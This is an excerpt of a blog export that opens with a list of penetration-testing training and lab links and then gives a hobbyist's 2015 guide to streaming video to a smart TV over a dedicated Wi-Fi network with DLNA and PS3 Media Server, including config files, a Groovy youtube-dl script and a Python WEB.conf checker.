background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://github.com/enaqx/awesome-pentest</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://worldwideprogramers.blogspot.com.br/2016/07/22-hacking-sites-ctfs-and-wargames-to.html?m=1</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br 
/></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Certifications/Training:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.offsec.com</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">https://kali.training/ --> </span><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><u style="background-attachment: 
initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">FREE TRAINING! </span></u></strong></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">https://portswigger.net/web-security --> </span><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><u style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">FREE TRAINING! 
</span></u></strong></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.elearn.com -> Moved to https://ine.com/learning/paths -> CyberSecurity</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.sans.org</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.eccouncil.org/Certification/certified-ethical-hacker</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; 
background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://courses.zeropointsecurity.co.uk/courses/red-team-ops<br />https://www.webhacking.com.br/ -> Portuguese language</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Here is a list of the most prominent CyberSecurity certifications, grouped by area:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 
0pt;"><span>https://pauljerimy.com/security-certification-roadmap/<br />Click on the image to enlarge it.<br /></span></span></p><div class="separator" style="clear: both; text-align: center;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwx2-dq9PWP9LIsq-VX6LV8Mmx-_Yoo6qHQbXeB3D7g2ubI_DB1W2ViLZom6kbbT8Rfd6D_pk5Zh5ScQ4zk1JowIGB75pXL558X_l53-REJqBMXBsjXPVKUP9vgtWF8TCK35nyJMSrt4uzihh293-bKcpv8T6KaL-Cl3OlfvXMZ8WZ0MNTjt1g3o5MjQ/s2529/cyber-sec-certs-2022.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1221" data-original-width="2529" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwx2-dq9PWP9LIsq-VX6LV8Mmx-_Yoo6qHQbXeB3D7g2ubI_DB1W2ViLZom6kbbT8Rfd6D_pk5Zh5ScQ4zk1JowIGB75pXL558X_l53-REJqBMXBsjXPVKUP9vgtWF8TCK35nyJMSrt4uzihh293-bKcpv8T6KaL-Cl3OlfvXMZ8WZ0MNTjt1g3o5MjQ/w640-h307/cyber-sec-certs-2022.png" width="640" /></a></span></div><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></span><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; 
margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Building a pentest lab:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://pen-testing.sans.org/blog/2014/02/27/building-a-pen-test-infrastructure-hacking-at-home-on-the-cheap</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; 
background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://community.rapid7.com/docs/DOC-2196</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.cybrary.it/0p3n/tutorial-for-setting-up-a-virtual-penetration-testing-lab-at-your-home/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Also, you can find an excellent pentest LAB for FREE on</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: 
initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>www.hackthebox.eu</span></strong></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>I recommend you take VIP access. 
It's about U$10/month, and it's totally worth it!</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>How To Ask Questions The Smart Way:</span></strong></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.catb.org/esr/faqs/smart-questions.html</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 
0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Thanks to <Illusional> for the help! \o/</span></span></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-20349691217786404162015-09-12T03:36:00.004-07:002015-09-12T15:45:06.853-07:00Streaming content to a TV over wifi - NetWorkMedia NWM - DLNA<div class="MsoNormal">
Well folks, <br />
<br />
I decided to write this post for a few reasons:<br />
I saw that many people have the same problem I do, and none of the solutions I found on the internet were satisfactory.<br />
I had some problems that other people didn't have, or had and didn't post about.<br />
I tried for 3 days to watch the first episode of Mr Robot and couldn't.<br />
I wanted to have internet and watch movies and videos at the same time. <br />
I didn't want to have to plug cables (HDMI) into the PC/notebook and the TV.<br />
I wanted to start watching Mr Robot.<br />
<br />
Basic information: I'm assuming you already know how to configure your TV and your network. If you don't, search Google for how to do it and please don't post things like "I have an LG model XyZ, the best in the galaxy, how do I configure it?" in the comments. Seriously, I won't answer! It depends on each model, so I'm keeping the article as generic as possible.<br />
<br />
No, I'm not going to include screenshots!<br />
<br />
Getting started: <br />
<br />
Problem: Miracast and WiDi don't work: Well, I tried for a few days to get these technologies working, without success. Each one has its own particularities, hardware requirements and blah blah that made me give up. <br />
<br />
So I went with DLNA (<a href="http://www.techtudo.com.br/dicas-e-tutoriais/noticia/2014/07/como-transmitir-conteudo-do-computador-pela-tv-wi-fi.html">http://www.techtudo.com.br/dicas-e-tutoriais/noticia/2014/07/como-transmitir-conteudo-do-computador-pela-tv-wi-fi.html</a>), which as you can see in the link is quite simple and easy to set up. However, I ran into a few things: <br />
<br />
My wifi router is in the bedroom and the TV in the living room; in the older buildings here in Poland the walls are very thick, so even though the distance is short the signal isn't good enough for streaming Full HD video, for example. But before discovering that, I followed the steps in the link above, and the connection was constantly dropped at random points of the movie; on top of that, using Microsoft's streaming the subtitles aren't loaded even when they have the same name as the file, as usual.</div>
<div class="MsoNormal">
I then looked for other software that does the same job and ended up finding PS Media Server <a href="http://www.ps3mediaserver.org/">http://www.ps3mediaserver.org/</a>; it has lots of codec options and subtitles are loaded! \o/.</div>
<div class="MsoNormal">
However, during playback the movie kept showing the loading message several times, so I investigated the cause and found that the software does on-the-fly encoding of the content sent to the TV, which requires quite a lot of CPU and memory.<br />
<br />
I first looked for a way to use lighter encodings, without success with the options the software offers, so I decided to disable encoding completely. BINGO! <br />
The loading screen stopped appearing during the movie (it takes a while to load in some cases), but the network started dropping during playback again.<br />
<br /></div>
<div class="MsoNormal">
Conclusion: my Wifi network can't handle video streaming and my internet access at the same time. Remember, in my case I have thick walls between the bedroom and the living room; for you this may not be a problem.
</div>
<div class="MsoNormal">
Solution: I created a separate network at home just for videos/music and the like, which I called NetWorkMedia (NWM). What's the advantage? <br />
<br />
You keep your internet independent. <br />
Your TV and devices don't have direct internet access, so it's less likely that someone exploits a vulnerability in them. <br />
You can connect your friends to your NWM without having to give out the password of your personal Wifi network. They can use notebooks and phones to send videos and music to your devices.<br />
You have a dedicated network for streaming video and music without interfering with your personal Wifi. <br />
You can use your computer as a bridge to the internet, meaning your devices aren't connected directly to the internet when you're not at home, for example. And best of all, NO WIRES, no HDMI cables spread around the house. <br />
The notebook/PC doesn't need to be near the TV because the cable is short, and so on.</div>
<div class="MsoNormal">
<br />
Problem: your TV has no direct internet access: <br />
Solution: As I said before, you can use any computer to act as this "bridge" between your devices and the internet. <br />
<br />
For my needs I set it up for access to the radio <a href="http://www.di.fm/">www.di.fm</a> and for streaming YouTube videos.
For YouTube you can do it in two ways: <br />
<br />
1- Download the video and stream it offline.<br />
2- Use a plugin for PMS that streams the content on-the-fly. <br />
<br />
So far we have: <br />
A 300 Mbps wifi network for videos/music and the like. By my calculations a transfer rate of about 60 Mbps is enough to watch Full HD and 4K movies without problems.<br />
Isolated from the internet or not (depends on how you want to use it).<br />
Quick and easy access for visitors.<br />
Low cost (in my case) hahaha<br />
0 cables!!!!!! I really hate cables! </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Let's get to the configuration (cookbook recipe): </div>
<div class="MsoNormal">
Network: <br />
Personal network: <br />
1 802.11n router/AP<br />
Internet access <br />
1 802.11n wifi card in the notebook or PC – can be Ethernet, 100/1000<br />
<br />
Configuration: <br />
Router IP: 192.168.0.1<br />
Notebook IP (personal wifi): 192.168.0.100 => I recommend a fixed IP to make things easier.<br />
Netmask: 255.255.255.0<br />
Default Gateway: 192.168.0.1<br />
DNS: 8.8.8.8 and 8.8.4.4 => Google's DNS, use whichever you prefer.<br />
<br />
NetWorkMedia (NWM)<br />
1 802.11n router - no internet <br />
1 802.11n USB wifi dongle<br />
1 Smart TV with Wifi or Ethernet (obviously!)<br />
<br />
Configuration<br />
Router: 192.168.1.1 -> ATTENTION! The IP/network MUST be different from the personal network!!!!</div>
<div class="MsoNormal">
Notebook IP (NWM – USB dongle): 192.168.1.100 -> same recommendation<br />
Netmask: 255.255.255.0<br />
Default Gateway: 192.168.1.1<br />
DNS -> Not needed, there's no internet here.</div>
<div class="MsoNormal">
Smart TV -> You can let your Smart TV configure itself or set it up in the same IP range as the NWM, for example 192.168.1.101. <br />
<br />
Blend everything and bake for 2 hours. Hahaha <br />
<br />
<br />
Software and versions: <br />
<br />
For the TV: check that the TV supports DLNA; if it doesn't, buy one! Hahaha<br />
<br />
For the notebook: PS Media Server 1.90.1 - http://www.ps3mediaserver.org/<br />
Plugin: PMSEncoder 2.0.0 - <a href="https://github.com/chocolateboy/pmsencoder">https://github.com/chocolateboy/pmsencoder</a><br />
youtube-dl - <a href="https://yt-dl.org/downloads/2015.09.09/youtube-dl.exe">https://yt-dl.org/downloads/2015.09.09/youtube-dl.exe</a><br />
RTMP Dump 2.4 -> We won't use it in this article, but it's good to download it.<br />
<br />
Install PMS<br />
Download the pmsencoder (JAR) and put it inside the plugins directory created by the PMS installation. <br />
<br />
After this, create the WEB.conf file in C:\ProgramData\PMS\ </div>
<div class="MsoNormal">
This file contains the configuration for my favourite radio stations and a link to a YouTube video. You must follow exactly the same model to add new videos. This link has more details: <a href="https://code.google.com/p/ps3mediaserver/issues/attachmentText?id=294&aid=5613783387044830644&name=web.conf&token=51e35537a9ee8f2b0e265857c2c91ccf">https://code.google.com/p/ps3mediaserver/issues/attachmentText?id=294&aid=5613783387044830644&name=web.conf&token=51e35537a9ee8f2b0e265857c2c91ccf</a><br />
<br />
Here is my WEB.conf (each entry is one line; the long lines were wrapped by the editor in the original post):<br />
</div>
<pre>
# audio streams
audiostream.Web,Radio=DiFM-Goa-Psy Trance,http://pub6.di.fm:80/di_goapsy_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Vocal Trance,http://pub7.di.fm:80/di_vocaltrance_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Progressive Psy,http://pub4.di.fm:80/di_progressivepsy_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Lounge,http://pub5.di.fm:80/di_lounge_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Hard Dance,http://pub8.di.fm:80/di_harddance_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Hard Techno,http://pub8.di.fm:80/di_hardtechno_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-House,http://pub7.di.fm:80/di_house_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Epic Trance,http://pub6.di.fm:80/di_epictrance_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Electro House,http://pub7.di.fm:80/di_electrohouse_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Drumstep,http://pub8.di.fm:80/di_drumstep_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Dark PsyTrance,http://pub6.di.fm:80/di_darkpsytrance_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Classic Trance,http://pub4.di.fm:80/di_classictrance_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Classic Vocal Trance,http://pub7.di.fm:80/di_classicvocaltrance_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Chillout Dreams,http://pub5.di.fm:80/di_chilloutdreams_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Chillout,http://pub8.di.fm:80/di_chillout_aac?b9ee7b9f36ecd5124c92c723
audiostream.Web,Radio=DiFM-Chill & Tropical House,http://pub6.di.fm:80/di_chillntropicalhouse_aac?b9ee7b9f36ecd5124c92c723

# youtube
videostream.Web,Youtube,https://www.youtube.com/watch?v=YqeW9_5kURI,https://www.youtube.com/watch?v=YqeW9_5kURI
</pre>
<div class="MsoNormal">
After this step, you need to add these lines to the PMS.conf file, which is in the same directory as WEB.conf: <br />
</div>
<pre>
youtube-dl.path = C:\\ProgramData\\PMS\\youtube-dl.exe
pmsencoder.script.directory = C:\\ProgramData\\PMS\\scripts
</pre>
<div class="MsoNormal">
Note: yes, those are double backslashes, I didn't mistype them! <br />
<br />
Now download youtube-dl and put it in C:\ProgramData\PMS\<br />
<br />
Create the scripts directory inside C:\ProgramData\PMS\ and inside it create the file youtube.groovy with the following content: <br />
</div>
<pre>
script {
    profile ('YouTube-DL') {
        pattern {
            match { YOUTUBE_DL_PATH }
            protocol([ 'http', 'https' ])
            match { isYouTubeDLCompatible(YOUTUBE_DL_PATH, uri) }
        }

        action {
            // if (YOUTUBE_DL_MAX_QUALITY) {
            //     downloader = YOUTUBE_DL_PATH + [ '--max-quality', YOUTUBE_DL_MAX_QUALITY, '--quiet', '-o', 'DOWNLOADER_OUT', 'URI' ]
            //} else {
            downloader = YOUTUBE_DL_PATH + [ '--quiet', '-o', 'DOWNLOADER_OUT', 'URI' ]
            //}
        }
    }

    // fall back to the native handler if youtube-dl is not installed/enabled
    profile ('YouTube') {
        pattern {
            // extract the resource's video_id from the URI of the standard YouTube page
            match uri: '^https?://(?:\\w+\\.)?youtube(-nocookie)?\\.com/watch\\?v=(?&lt;youtube_video_id&gt;[^&]+)'
        }

        // Now, with $video_id defined, call the builtin YouTube handler.
        // Note: the parentheses are required for a no-arg method call
        action {
            youtube()
        }
    }
}
</pre>
<div class="MsoNormal">
Note that some lines of the action block are commented out. I did that because youtube-dl no longer supports the --max-quality parameter. Here is the link to the original file: <a href="https://github.com/chocolateboy/pmsencoder/blob/master/src/main/resources/scripts/youtube.groovy">https://github.com/chocolateboy/pmsencoder/blob/master/src/main/resources/scripts/youtube.groovy</a></div>
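<div class="MsoNormal">
As an added example (not code from the post and not part of PS3 Media Server or PMSEncoder), the script below parses WEB.conf entries in the shape used above and re-applies the video_id test from youtube.groovy in Python. It assumes the entry shape TYPE.FOLDER[,SUBFOLDER]=NAME,URL[,MORE] and, as in the youtube line above, the same shape without "=NAME"; the host names and the listen token in its sample are placeholders, and the finding codes are my own names. The one check beyond the post's own rules is that a plain-http URL with a query string is flagged, because whatever token that query carries crosses the NWM and the bridging notebook's uplink unencrypted.</div>

```python
"""Parser and sanity checker for PMS WEB.conf entries in the shape the post uses.

Added example, not from the post or PS3 Media Server. Assumed entry shape:
    TYPE.FOLDER[,SUBFOLDER...]=NAME,URL[,MORE FIELDS]
and, as in the post's youtube line, the same shape without "=NAME".
"""
import re
from urllib.parse import urlsplit

# The video_id pattern from youtube.groovy. Groovy's named group became a plain
# group 2 here; the rest of the expression is unchanged.
YOUTUBE_ID_RE = re.compile(
    r"^https?://(?:\w+\.)?youtube(-nocookie)?\.com/watch\?v=([^&]+)"
)

# Constructed sample in the post's format (hosts and the token are placeholders).
SAMPLE_WEB_CONF = """\
# audio streams
audiostream.Web,Radio=DiFM-Chill & Tropical House,http://pub6.example.invalid:80/di_chillntropicalhouse_aac?listen-key-placeholder

# youtube
videostream.Web,Youtube,https://www.youtube.com/watch?v=YqeW9_5kURI,https://www.youtube.com/watch?v=YqeW9_5kURI
videostream.Web,Youtube=Not a watch page,https://www.example.invalid/watch?v=abc
"""


def parse_line(line):
    """Parse one WEB.conf line; return None for blank lines and '#' comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    kind, dot, rest = line.partition(".")
    url_at = re.search(r"https?://", rest)
    if not dot or not url_at:
        raise ValueError(f"malformed entry: {line}")
    # Everything before the first URL is "FOLDER PATH[=NAME]". The folder path is
    # itself comma separated (Web,Radio), so a plain split on ',' would break it.
    head = rest[: url_at.start()].rstrip(",")
    urls = rest[url_at.start():].split(",")
    folder, eq, name = head.partition("=")
    return {
        "type": kind,
        "folder": folder.split(","),
        "name": name if eq else None,
        "url": urls[0],
        "extra": urls[1:],
    }


def check_entry(entry):
    """Return finding codes for one entry (empty list when it looks sane)."""
    findings = []
    parts = urlsplit(entry["url"])
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return ["not-http-url"]
    if parts.scheme == "http" and parts.query:
        # A token in the query string over plain http is visible to anyone on the
        # path: the NWM, the bridging notebook and its uplink.
        findings.append("query-over-http")
    if entry["type"] == "videostream" and entry["folder"][-1].lower() == "youtube":
        # The same test youtube.groovy applies before calling the builtin handler.
        if not YOUTUBE_ID_RE.match(entry["url"]):
            findings.append("not-youtube-watch-url")
    return findings


def youtube_id(url):
    """The video_id youtube.groovy would capture from a watch URL, or None."""
    m = YOUTUBE_ID_RE.match(url)
    return m.group(2) if m else None


def check_web_conf(text):
    """Parse a whole file; return (entry, findings) pairs in file order."""
    entries = [e for e in map(parse_line, text.splitlines()) if e is not None]
    return [(e, check_entry(e)) for e in entries]


if __name__ == "__main__":
    for entry, findings in check_web_conf(SAMPLE_WEB_CONF):
        print(entry["url"], "OK" if not findings else ", ".join(findings))
```

<div class="MsoNormal">
Run against the radio lines above it reports query-over-http for every station, which is the cost of the plain-http listen URLs; the youtube line passes the same pattern the Groovy script uses, so an entry that fails here would also fall through the YouTube profile in PMSEncoder.</div>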
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now let's configure PS3 Media Server: <br />
<br />
Start PMS<br />
Go to the General Configuration tab: <br />
In the option Force server IP, enter the IP chosen for the NWM wifi dongle, in my case 192.168.1.100. <br />
<br />
In the option Maximum bandwidth in Mb/s, I left it at 0 (no limit); as this network is dedicated to streaming, it makes no sense to impose limits. <br />
<br />
Check the option prevent sleep mode while streaming.<br />
<br />
Check that PMSEncoder appears under Plugin system. If it doesn't, you did something wrong; review the installation from the start. </div>
<div class="MsoNormal">
In the Navigation / Share settings tab <br />
<br />
Uncheck the option Hide #Transcode# folder <br />
This directory is created automatically by PMS. As PMS has several plugins for playing video, it tries to create a stream for each kind of encoding (a brilliant move by the developer), so if your video isn't supported by the default encoder you can go into this folder and try to play your video/music using other encoders.</div>
<div class="MsoNormal">
Under Shared folders, add the directory where your movies and so on are kept.</div>
<div class="MsoNormal">
In the Transcoding settings tab: <br />
Click Common transcoding settings<br />
<br />
In the option Skip transcoding for the following extensions -> enter the extensions for which you don't want PMS to use an encoder when sending. As I said at the start, it does this on-the-fly, and since we now have a fast network there's no need for it. In my case the extensions I entered were: mkv,avi</div>
<div class="MsoNormal">
Trick: In some cases TVs say they don't support mkv or avi; in that case just try switching the extension between these two types. <br />
<br />
In the option Video file engines -> In my case I set VLC Video as the default (if your VLC isn't up to date, update it!). VLC can play a wide variety of encodings, so I disabled the others. However, if VLC doesn't play some content, just enable the others and test. To set it as the default, use the arrows in the bottom left corner; the plug icon enables or disables the player.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Web video streaming engines. <br />
